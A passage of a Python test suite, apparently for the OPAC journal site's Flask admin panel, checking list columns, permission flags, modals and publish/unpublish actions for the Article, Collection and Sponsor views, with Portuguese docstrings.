'sections',
'authors',
'abstract',
'order',
'doi',
'languages',
'abstract_languages',
]
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
column_labels = self.get_context_variable('admin_view').column_labels
self.assertEqual(len(expected_column_labels), len(column_labels))
for expected_column_label in expected_column_labels:
self.assertIn(expected_column_label, column_labels.keys())
def test_admin_article_check_can_create_is_false(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de Article: /admin/article/
Verificamos:
- que não permite criar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
can_create = self.get_context_variable('admin_view').can_create
self.assertFalse(can_create)
def test_admin_article_check_can_edit_is_false(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de Article: /admin/article/
Verificamos:
- que não permite editar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
can_edit = self.get_context_variable('admin_view').can_edit
self.assertFalse(can_edit)
def test_admin_article_check_can_delete_is_false(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de articles: /admin/article/
Verificamos:
- que não permite apagar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
can_delete = self.get_context_variable('admin_view').can_delete
self.assertFalse(can_delete)
def test_admin_article_check_create_modal_is_true(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de periódicos: /admin/article/
Verificamos:
- que não permite editar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
create_modal = self.get_context_variable('admin_view').create_modal
self.assertTrue(create_modal)
def test_admin_article_check_edit_modal_is_true(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de periódicos: /admin/article/
Verificamos:
- que não permite editar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
edit_modal = self.get_context_variable('admin_view').edit_modal
self.assertTrue(edit_modal)
def test_admin_article_check_can_view_details_is_true(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de articles: /admin/article/
Verificamos:
- que não permite editar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
can_view_details = self.get_context_variable('admin_view').can_view_details
self.assertTrue(can_view_details)
def test_admin_article_check_actions_defined(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de articles: /admin/article/
Verificamos:
- que contém todas as etiquetas de campos esperadas
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
expected_actions = [
'publish',
'unpublish_default',
]
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
actions = [a[0] for a in self.get_context_variable('actions')]
self.assertEqual(len(expected_actions), len(actions))
for expected_action in expected_actions:
self.assertIn(expected_action, actions)
def test_admin_article_action_publishing_an_unpublished_article(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Article no banco (is_public=False)
Quando:
- fazemos login e
- acessamos a pagina de listagem de Articles: /admin/article/
- realizamos a ação de pubilcar
Verificamos:
- o artigo deve ficar como público
- o usuario é notificado do resultado da operação
"""
# with
article = makeOneArticle({'is_public': False})
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
publish_action_url = '%saction/' % article_index_url
expected_msg = u'Artigo(s) publicado com sucesso!!'
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acessamos a listagem de artigos
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# executamos ação publicar:
action_response = client.post(
publish_action_url,
data={
'url': article_index_url,
'action': 'publish',
'rowid': article.id,
},
follow_redirects=True
)
self.assertStatus(action_response, 200)
self.assertTemplateUsed('admin/model/list.html')
self.assertIn(expected_msg, action_response.data.decode('utf-8'))
article.reload()
self.assertTrue(article.is_public)
def test_admin_article_action_publishing_a_public_article(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Article no banco (is_public=True)
Quando:
- fazemos login e
- acessamos a pagina de listagem de articles: /admin/article/
- realizamos a ação de pubilcar
Verificamos:
- o article deve ficar como público
- o usuario é notificado do resultado da operação
"""
# with
article = makeOneArticle({'is_public': True})
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
action_url = '%saction/' % article_index_url
expected_msg = u'Artigo(s) publicado com sucesso!!'
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acessamos a listagem de artigos
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# then
# executamos ação publicar:
action_response = client.post(
action_url,
data={
'url': article_index_url,
'action': 'publish',
'rowid': article.id,
},
follow_redirects=True
)
self.assertStatus(action_response, 200)
self.assertTemplateUsed('admin/model/list.html')
self.assertIn(expected_msg, action_response.data.decode('utf-8'))
article.reload()
self.assertTrue(article.is_public)
def test_admin_article_action_unpublish_default_a_public_article(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Article no banco (is_public=True)
Quando:
- fazemos login e
- acessamos a pagina de listagem de articles: /admin/article/
- realizamos a ação de despublicar (unpublis_default)
Verificamos:
- o article deve ficar despublicado
- o motivo de despublicação deve ser por: 'Conteúdo temporariamente indisponível'
- o usuario é notificado do resultado da operação
"""
# with
article = makeOneArticle({'is_public': True})
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
action_url = '%saction/' % article_index_url
expected_msg = 'Artigo(s) despublicado com sucesso!!'
expected_reason = 'Conteúdo temporariamente indisponível'
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acessamos a listagem de periódicos
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# then
# executamos ação publicar:
action_response = client.post(
action_url,
data={
'url': article_index_url,
'action': 'unpublish_default',
'rowid': article.id,
},
follow_redirects=True
)
self.assertStatus(action_response, 200)
self.assertTemplateUsed('admin/model/list.html')
self.assertIn(expected_msg, action_response.data.decode('utf-8'))
article.reload()
self.assertFalse(article.is_public)
self.assertEqual(expected_reason, article.unpublish_reason)
def test_admin_article_action_publish_with_exception_raised_must_be_consistent(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Article no banco (is_public=False)
Quando:
- fazemos login e
- acessamos a pagina de listagem de Articles: /admin/article/
- realizamos a ação de publicacar, mas é levantada uma exceção no processo
Verificamos:
- o Article deve ficar como não público (is_public=False)
- o usuario é notificado que houve um erro na operação
"""
# with
article = makeOneArticle({'is_public': False})
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
action_url = '%saction/' % article_index_url
expected_msg = u'Ocorreu um erro tentando despublicar o(s) número(s)!!.'
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acessamos a listagem de periódicos
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# then
# executamos ação publicar:
with self.assertRaises(Exception):
action_response = client.post(
action_url,
data={
'url': article_index_url,
'action': 'publish',
'rowid': None, # sem rowid deveria gerar uma exeção
},
follow_redirects=True
)
self.assertStatus(action_response, 200)
self.assertTemplateUsed('admin/model/list.html')
self.assertIn(expected_msg, action_response.data.decode('utf-8'))
article.reload()
self.assertTrue(article.is_public)
def test_admin_article_action_unpublish_default_with_exception_raised_must_be_consistent(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Article no banco (is_public=True)
Quando:
- fazemos login e
- acessamos a pagina de listagem de Articles: /admin/article/
- realizamos a ação de despublicacar (unpublish_default), mas é levantada uma exceção no processo
Verificamos:
- o article deve ficar como público (is_public=True)
- o usuario é notificado que houve um erro na operação
"""
# with
article = makeOneArticle({'is_public': True})
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
action_url = '%saction/' % article_index_url
expected_msg = u'Ocorreu um erro tentando despublicar o(s) número(s)!!.'
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acessamos a listagem de Issues
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# then
# executamos ação publicar:
with self.assertRaises(Exception):
action_response = client.post(
action_url,
data={
'url': article_index_url,
'action': 'unpublish_default',
'rowid': None, # sem rowid deveria gerar uma exeção
},
follow_redirects=True
)
self.assertStatus(action_response, 200)
self.assertTemplateUsed('admin/model/list.html')
self.assertIn(expected_msg, action_response.data)
article.reload()
self.assertTrue(article.is_public)
class CollectionAdminViewTests(BaseTestCase):
def test_admin_collection_list_records(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Collection no banco
Quando:
- fazemos login e
- acessamos a pagina /admin/collection/
Verificamos:
- o Collection criado deve estar listado nessa página
- e o template utilizado é o esperado
"""
# with
collection = makeOneCollection()
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
self.assertTemplateUsed('admin/index.html')
self.assertTrue(current_user.is_authenticated)
# acesso a aba de collection
collection_list_response = client.get(url_for('collection.index_view'))
self.assertStatus(collection_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# then
# verificamos a resposta
# que tem a id para acessar ao collection
self.assertIn(collection.id, collection_list_response.data.decode('utf-8'))
def test_admin_collection_details(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Collection no banco
Quando:
- fazemos login e
- acessamos a pagina de detalhe do Collection: /admin/collection/details/
Verificamos:
- a pagina mostra o Collection certo
"""
# with
collection = makeOneCollection()
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
collection_detail_url = url_for('collection.details_view', id=collection.id)
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
self.assertTemplateUsed('admin/index.html')
self.assertTrue(current_user.is_authenticated)
# acesso a aba de Collection
collection_detail_response = client.get(collection_detail_url)
self.assertStatus(collection_detail_response, 200)
self.assertTemplateUsed('admin/model/details.html')
# then
# verificamos a resposta
# que tem a id para acessar ao Collection
self.assertIn(collection.id, collection_detail_response.data.decode('utf-8'))
def test_admin_collection_check_column_exclude_list(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de collections: /admin/collection/
Verificamos:
- que contém todos os campos excluidos da listagem são os esperados
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
collection_index_url = url_for('collection.index_view')
expected_column_exclude_list = [
'_id', 'about', 'home_logo_pt', 'home_logo_es', 'home_logo_en',
'header_logo_pt', 'header_logo_es', 'header_logo_en',
'menu_logo_pt', 'menu_logo_es', 'menu_logo_en',
'logo_footer', 'logo_drop_menu'
]
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de collections
collection_list_response = client.get(collection_index_url)
self.assertStatus(collection_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
column_exclude_list = self.get_context_variable('admin_view').column_exclude_list
self.assertEqual(len(expected_column_exclude_list), len(column_exclude_list))
for expected_excluded_field in expected_column_exclude_list:
self.assertIn(expected_excluded_field, column_exclude_list)
def test_admin_collection_check_form_excluded_columns(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de collections: /admin/collection/
Verificamos:
- que contém todos os campos excluidos do formulario são os esperados
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
collection_index_url = url_for('collection.index_view')
expected_form_excluded_columns = ('acronym', 'metrics')
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de collections
collection_list_response = client.get(collection_index_url)
self.assertStatus(collection_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
form_excluded_columns = self.get_context_variable('admin_view').form_excluded_columns
self.assertEqual(len(expected_form_excluded_columns), len(form_excluded_columns))
for expected_form_excluded_column in expected_form_excluded_columns:
self.assertIn(expected_form_excluded_column, form_excluded_columns)
def test_admin_collection_check_can_create_is_false(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de Article: /admin/collection/
Verificamos:
- que não permite criar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
collection_index_url = url_for('collection.index_view')
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
collection_list_response = client.get(collection_index_url)
self.assertStatus(collection_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
can_create = self.get_context_variable('admin_view').can_create
self.assertFalse(can_create)
def test_admin_collection_check_can_edit_is_true(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de Article: /admin/collection/
Verificamos:
- que não permite editar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
collection_index_url = url_for('collection.index_view')
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
collection_list_response = client.get(collection_index_url)
self.assertStatus(collection_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
can_edit = self.get_context_variable('admin_view').can_edit
self.assertTrue(can_edit)
def test_admin_collection_check_can_delete_is_false(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de collections: /admin/collection/
Verificamos:
- que não permite apagar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
collection_index_url = url_for('collection.index_view')
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
collection_list_response = client.get(collection_index_url)
self.assertStatus(collection_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
can_delete = self.get_context_variable('admin_view').can_delete
self.assertFalse(can_delete)
def test_admin_collection_check_create_modal_is_true(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de periódicos: /admin/collection/
Verificamos:
- que não permite editar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
collection_index_url = url_for('collection.index_view')
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
collection_list_response = client.get(collection_index_url)
self.assertStatus(collection_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
create_modal = self.get_context_variable('admin_view').create_modal
self.assertTrue(create_modal)
def test_admin_collection_check_edit_modal_is_true(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de periódicos: /admin/collection/
Verificamos:
- que não permite editar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
collection_index_url = url_for('collection.index_view')
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
collection_list_response = client.get(collection_index_url)
self.assertStatus(collection_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
edit_modal = self.get_context_variable('admin_view').edit_modal
self.assertTrue(edit_modal)
def test_admin_collection_check_can_view_details_is_true(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de collections: /admin/collection/
Verificamos:
- que não permite editar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
collection_index_url = url_for('collection.index_view')
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
collection_list_response = client.get(collection_index_url)
self.assertStatus(collection_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
can_view_details = self.get_context_variable('admin_view').can_view_details
self.assertTrue(can_view_details)
class SponsorAdminViewTests(BaseTestCase):
def test_admin_sponsor_list_records(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Collection no banco
Quando:
- fazemos login e
- acessamos a pagina /admin/sponsor/
Verificamos:
- o Collection criado deve estar listado nessa página
- e o template utilizado é o esperado
"""
# with
sponsor = makeOneSponsor()
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
self.assertTemplateUsed('admin/index.html')
self.assertTrue(current_user.is_authenticated)
# acesso a aba de Sponsor
sponsor_list_response = client.get(url_for('sponsor.index_view'))
self.assertStatus(sponsor_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# then
# verificamos a resposta
# que tem a id para acessar ao sponsor
self.assertIn(sponsor.id, sponsor_list_response.data.decode('utf-8'))
def test_admin_sponsor_details(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Sponsor no banco
Quando:
- fazemos login e
- acessamos a pagina de detalhe do Sponsor: /admin/sponsor/details/
Verificamos:
- a pagina mostra o Sponsor certo
"""
# with
sponsor = makeOneSponsor()
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
sponsor_detail_url = url_for('sponsor.details_view', id=sponsor.id)
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
self.assertTemplateUsed('admin/index.html')
self.assertTrue(current_user.is_authenticated)
# acesso a aba de Sponsor
sponsor_detail_response = client.get(sponsor_detail_url)
self.assertStatus(sponsor_detail_response, 200)
self.assertTemplateUsed('admin/model/details.html')
# then
# verificamos a resposta
# que tem a id para acessar ao Sponsor
self.assertIn(sponsor.id, sponsor_detail_response.data.decode('utf-8'))
def test_admin_sponsor_check_column_exclude_list(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de sponsors: /admin/sponsor/
Verificamos:
- que contém todos os campos excluidos da listagem são os esperados
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
sponsor_index_url = url_for('sponsor.index_view')
expected_column_exclude_list = ('_id', )
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de Sponsor
sponsor_list_response = client.get(sponsor_index_url)
self.assertStatus(sponsor_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
column_exclude_list = self.get_context_variable('admin_view').column_exclude_list
self.assertEqual(len(expected_column_exclude_list), len(column_exclude_list))
for expected_excluded_field in expected_column_exclude_list:
self.assertIn(expected_excluded_field, column_exclude_list)
def test_admin_sponsor_check_form_excluded_columns(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de sponsors: /admin/sponsor/
Verificamos:
- que contém todos os campos excluidos do formulario são os esperados
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
sponsor_index_url = url_for('sponsor.index_view')
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de Sponsor
sponsor_list_response = client.get(sponsor_index_url)
self.assertStatus(sponsor_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
form_excluded_columns = self.get_context_variable('admin_view').form_excluded_columns
self.assertEqual(None, form_excluded_columns)
def test_admin_sponsor_check_can_create_is_true(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de Sponsor: /admin/sponsor/
Verificamos:
- que não permite criar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
sponsor_index_url = url_for('sponsor.index_view')
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de Sponsor
sponsor_list_response = client.get(sponsor_index_url)
self.assertStatus(sponsor_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
can_create = self.get_context_variable('admin_view').can_create
self.assertTrue(can_create)
def test_admin_sponsor_check_can_edit_is_true(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de Article: /admin/sponsor/
Verificamos:
- que não permite editar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
sponsor_index_url = url_for('sponsor.index_view')
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de Sponsor
sponsor_list_response = client.get(sponsor_index_url)
self.assertStatus(sponsor_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
can_edit = self.get_context_variable('admin_view').can_edit
self.assertTrue(can_edit)
def test_admin_sponsor_check_can_delete_is_true(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de sponsors: /admin/sponsor/
Verificamos:
- que não permite apagar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
sponsor_index_url = url_for('sponsor.index_view')
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de sponsor
sponsor_list_response = client.get(sponsor_index_url)
self.assertStatus(sponsor_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
can_delete = self.get_context_variable('admin_view').can_delete
self.assertTrue(can_delete)
def test_admin_sponsor_check_create_modal_is_true(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de sponsor: /admin/sponsor/
Verificamos:
- que não permite editar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
sponsor_index_url = url_for('sponsor.index_view')
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de sponsor
sponsor_list_response = client.get(sponsor_index_url)
self.assertStatus(sponsor_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
create_modal = self.get_context_variable('admin_view').create_modal
self.assertTrue(create_modal)
def test_admin_sponsor_check_edit_modal_is_true(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de sponsor: /admin/sponsor/
Verificamos:
- que não permite editar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
sponsor_index_url = url_for('sponsor.index_view')
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de sponsor
sponsor_list_response = client.get(sponsor_index_url)
self.assertStatus(sponsor_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
edit_modal = self.get_context_variable('admin_view').edit_modal
